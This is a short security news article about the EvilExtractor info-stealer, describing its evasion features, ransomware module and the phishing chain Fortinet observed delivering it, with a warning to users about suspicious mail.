The attack tool known as Evil Extractor and developed by a company called Kodex as an “educational tool,” has been used by threat actors to target Windows-based machines.
What Is EvilExtractor?
EvilExtractor malware affects Windows systems, and attackers utilize it mainly for stealing browser data and other sensitive information. Kodex released the malware in October 2022 and has since been updating it.
Further, Evil Extractor contains environment checking as well as anti-virtual machine (VM) and VirusTotal capabilities designed to avoid detection. The malware also has a ransomware function called “Kodex Ransomware.”
Most infections were caused by a phishing campaign in which attackers dropped a Python executable. Fortinet discovered several attacks masquerading as account confirmation requests, each with a gzip-compressed executable attachment. This executable is designed to look like a legitimate PDF or Dropbox file.
When the target opens the file, a PyInstaller file is executed, which launches a .NET loader that launches an EvilExtractor executable using a base64-encoded PowerShell script.
The following modules are part of the EvilExtractor version used in these attacks:
- Date time checking
- FTP server setting
- Steal data
- Upload Stolen data
- Clear log
“Users should be aware of this new info stealer and continue to be cautious about suspicious mail.”